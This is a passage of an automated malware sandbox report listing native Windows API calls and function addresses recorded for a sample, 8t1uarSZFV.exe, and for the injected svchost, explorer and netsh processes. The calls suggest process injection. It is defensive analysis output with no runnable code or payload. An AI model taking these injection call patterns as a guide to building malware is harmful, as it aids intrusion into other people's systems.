          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012DB0 NtEnumerateKey,1_2_03012DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012C00 NtQueryInformationProcess,1_2_03012C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012C60 NtCreateKey,1_2_03012C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012C70 NtFreeVirtualMemory,1_2_03012C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012CC0 NtQueryVirtualMemory,1_2_03012CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012CF0 NtOpenProcess,1_2_03012CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03013010 NtOpenDirectoryObject,1_2_03013010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03013090 NtSetValueKey,1_2_03013090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030135C0 NtCreateMutant,1_2_030135C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030139B0 NtGetContextThread,1_2_030139B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03013D10 NtOpenProcessToken,1_2_03013D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03013D70 NtOpenThread,1_2_03013D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,1_2_00ECA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECA042 NtQueryInformationProcess,1_2_00ECA042
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7E232 NtCreateFile,2_2_0FB7E232
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7FE12 NtProtectVirtualMemory,2_2_0FB7FE12
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7FE0A NtProtectVirtualMemory,2_2_0FB7FE0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2B60 NtClose,LdrInitializeThunk,3_2_035F2B60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2AD0 NtReadFile,LdrInitializeThunk,3_2_035F2AD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2F30 NtCreateSection,LdrInitializeThunk,3_2_035F2F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2FE0 NtCreateFile,LdrInitializeThunk,3_2_035F2FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_035F2EA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_035F2D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_035F2DD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_035F2DF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_035F2C70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2C60 NtCreateKey,LdrInitializeThunk,3_2_035F2C60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_035F2CA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F35C0 NtCreateMutant,LdrInitializeThunk,3_2_035F35C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F4340 NtSetContextThread,3_2_035F4340
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F4650 NtSuspendThread,3_2_035F4650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2BF0 NtAllocateVirtualMemory,3_2_035F2BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2BE0 NtQueryValueKey,3_2_035F2BE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2B80 NtQueryInformationFile,3_2_035F2B80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2BA0 NtEnumerateValueKey,3_2_035F2BA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2AF0 NtWriteFile,3_2_035F2AF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2AB0 NtWaitForSingleObject,3_2_035F2AB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2F60 NtCreateProcessEx,3_2_035F2F60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2F90 NtProtectVirtualMemory,3_2_035F2F90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2FB0 NtResumeThread,3_2_035F2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2FA0 NtQuerySection,3_2_035F2FA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2E30 NtWriteVirtualMemory,3_2_035F2E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2EE0 NtQueueApcThread,3_2_035F2EE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2E80 NtReadVirtualMemory,3_2_035F2E80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2D00 NtSetInformationFile,3_2_035F2D00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2D30 NtUnmapViewOfSection,3_2_035F2D30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2DB0 NtEnumerateKey,3_2_035F2DB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2C00 NtQueryInformationProcess,3_2_035F2C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2CC0 NtQueryVirtualMemory,3_2_035F2CC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2CF0 NtOpenProcess,3_2_035F2CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F3010 NtOpenDirectoryObject,3_2_035F3010
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F3090 NtSetValueKey,3_2_035F3090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F39B0 NtGetContextThread,3_2_035F39B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F3D70 NtOpenThread,3_2_035F3D70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F3D10 NtOpenProcessToken,3_2_035F3D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0095A350 NtCreateFile,3_2_0095A350
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0095A480 NtClose,3_2_0095A480
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0095A400 NtReadFile,3_2_0095A400
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0095A47A NtClose,3_2_0095A47A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010CA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,3_2_010CA036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010C9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,3_2_010C9BAF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010CA042 NtQueryInformationProcess,3_2_010CA042
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010C9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_010C9BB2
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0100D5EB
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01001201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_01001201
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0100E8F6
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FA80600_2_00FA8060
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010120460_2_01012046
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010082980_2_01008298
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FDE4FF0_2_00FDE4FF
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FD676B0_2_00FD676B
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010348730_2_01034873
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FACAF00_2_00FACAF0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FCCAA00_2_00FCCAA0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FBCC390_2_00FBCC39
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FD6DD90_2_00FD6DD9
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FA91C00_2_00FA91C0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FBB1190_2_00FBB119
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC13940_2_00FC1394
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC17060_2_00FC1706
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC781B0_2_00FC781B
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC19B00_2_00FC19B0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FB997D0_2_00FB997D
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FA79200_2_00FA7920
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC7A4A0_2_00FC7A4A
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC7CA70_2_00FC7CA7
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC1C770_2_00FC1C77
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FD9EEE0_2_00FD9EEE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0102BE440_2_0102BE44
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC1F320_2_00FC1F32
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00F035E00_2_00F035E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D881_2_00402D88
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D5931_2_0041D593
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409E501_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EE2E1_2_0041EE2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E7931_2_0041E793
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309A3521_2_0309A352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A03E61_2_030A03E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE3F01_2_02FEE3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030802741_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030602C01_2_030602C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307A1181_2_0307A118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030681581_2_03068158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A01AA1_2_030A01AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030941A21_2_030941A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030981CC1_2_030981CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720001_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD01001_2_02FD0100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFC6E01_2_02FFC6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030047501_2_03004750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDC7C01_2_02FDC7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE07701_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A05911_2_030A0591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030844201_2_03084420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030924461_2_03092446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE05351_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308E4F61_2_0308E4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309AB401_2_0309AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA801_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03096BD71_2_03096BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC68B81_2_02FC68B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AA9A61_2_030AA9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE28401_2_02FE2840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA8401_2_02FEA840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A01_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF69621_2_02FF6962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E8F01_2_0300E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03022F281_2_03022F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03000F301_2_03000F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03082F301_2_03082F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054F401_2_03054F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF2E901_2_02FF2E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EFA01_2_0305EFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0E591_2_02FE0E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309EE261_2_0309EE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2FC81_2_02FD2FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309CE931_2_0309CE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309EEDB1_2_0309EEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0CF21_2_02FD0CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307CD1F1_2_0307CD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0C001_2_02FE0C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDADE01_2_02FDADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8DBF1_2_02FF8DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03080CB51_2_03080CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEAD001_2_02FEAD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFD2F01_2_02FFD2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309132D1_2_0309132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFB2C01_2_02FFB2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE52A01_2_02FE52A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302739A1_2_0302739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCD34C1_2_02FCD34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030812ED1_2_030812ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE70C01_2_02FE70C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AB16B1_2_030AB16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0301516C1_2_0301516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEB1B01_2_02FEB1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCF1721_2_02FCF172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308F0CC1_2_0308F0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030970E91_2_030970E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309F0E01_2_0309F0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309F7B01_2_0309F7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030256301_2_03025630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030916CC1_2_030916CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030975711_2_03097571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD14601_2_02FD1460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307D5B01_2_0307D5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A95C31_2_030A95C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309F43F1_2_0309F43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309FB761_2_0309FB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03055BF01_2_03055BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0301DBF91_2_0301DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309FA491_2_0309FA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03097A461_2_03097A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03053A6C1_2_03053A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFB801_2_02FFFB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03025AA01_2_03025AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307DAAC1_2_0307DAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03081AA31_2_03081AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308DAC61_2_0308DAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030759101_2_03075910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE38E01_2_02FE38E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304D8001_2_0304D800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE99501_2_02FE9950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFB9501_2_02FFB950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309FF091_2_0309FF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE9EB01_2_02FE9EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309FFB11_2_0309FFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FA3FD21_2_02FA3FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FA3FD51_2_02FA3FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE1F921_2_02FE1F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03091D5A1_2_03091D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03097D731_2_03097D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03059C321_2_03059C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFDC01_2_02FFFDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE3D401_2_02FE3D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309FCF21_2_0309FCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECA0361_2_00ECA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00EC10821_2_00EC1082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECB2321_2_00ECB232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECE5CD1_2_00ECE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00EC89121_2_00EC8912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00EC5B301_2_00EC5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00EC5B321_2_00EC5B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00EC2D021_2_00EC2D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0F631B322_2_0F631B32
          Source: C:\Windows\explorer.exeCode function: 2_2_0F631B302_2_0F631B30
          Source: C:\Windows\explorer.exeCode function: 2_2_0F6372322_2_0F637232
          Source: C:\Windows\explorer.exeCode function: 2_2_0F62ED022_2_0F62ED02
          Source: C:\Windows\explorer.exeCode function: 2_2_0F6349122_2_0F634912
          Source: C:\Windows\explorer.exeCode function: 2_2_0F63A5CD2_2_0F63A5CD
          Source: C:\Windows\explorer.exeCode function: 2_2_0F6360362_2_0F636036
          Source: C:\Windows\explorer.exeCode function: 2_2_0F62D0822_2_0F62D082
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7E2322_2_0FB7E232
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB815CD2_2_0FB815CD
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB78B322_2_0FB78B32
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB78B302_2_0FB78B30
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7B9122_2_0FB7B912
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB75D022_2_0FB75D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB740822_2_0FB74082
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7D0362_2_0FB7D036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_01565EB03_2_01565EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367A3523_2_0367A352
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036803E63_2_036803E6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035CE3F03_2_035CE3F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036602743_2_03660274
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036402C03_2_036402C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036481583_2_03648158
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035B01003_2_035B0100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0365A1183_2_0365A118
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036781CC3_2_036781CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036801AA3_2_036801AA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036741A23_2_036741A2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036520003_2_03652000
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035E47503_2_035E4750
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C07703_2_035C0770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035BC7C03_2_035BC7C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035DC6E03_2_035DC6E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C05353_2_035C0535
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036805913_2_03680591
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036724463_2_03672446
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036644203_2_03664420
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0366E4F63_2_0366E4F6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367AB403_2_0367AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03676BD73_2_03676BD7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035BEA803_2_035BEA80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035D69623_2_035D6962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0368A9A63_2_0368A9A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C29A03_2_035C29A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035CA8403_2_035CA840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C28403_2_035C2840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035EE8F03_2_035EE8F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035A68B83_2_035A68B8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03634F403_2_03634F40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03602F283_2_03602F28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03662F303_2_03662F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035E0F303_2_035E0F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035B2FC83_2_035B2FC8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0363EFA03_2_0363EFA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C0E593_2_035C0E59
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367EE263_2_0367EE26
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367EEDB3_2_0367EEDB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035D2E903_2_035D2E90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367CE933_2_0367CE93
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035CAD003_2_035CAD00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0365CD1F3_2_0365CD1F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035BADE03_2_035BADE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035D8DBF3_2_035D8DBF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C0C003_2_035C0C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035B0CF23_2_035B0CF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03660CB53_2_03660CB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035AD34C3_2_035AD34C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367132D3_2_0367132D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0360739A3_2_0360739A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036612ED3_2_036612ED
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035DB2C03_2_035DB2C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035DD2F03_2_035DD2F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C52A03_2_035C52A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0368B16B3_2_0368B16B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035AF1723_2_035AF172
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F516C3_2_035F516C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035CB1B03_2_035CB1B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367F0E03_2_0367F0E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036770E93_2_036770E9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C70C03_2_035C70C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0366F0CC3_2_0366F0CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367F7B03_2_0367F7B0
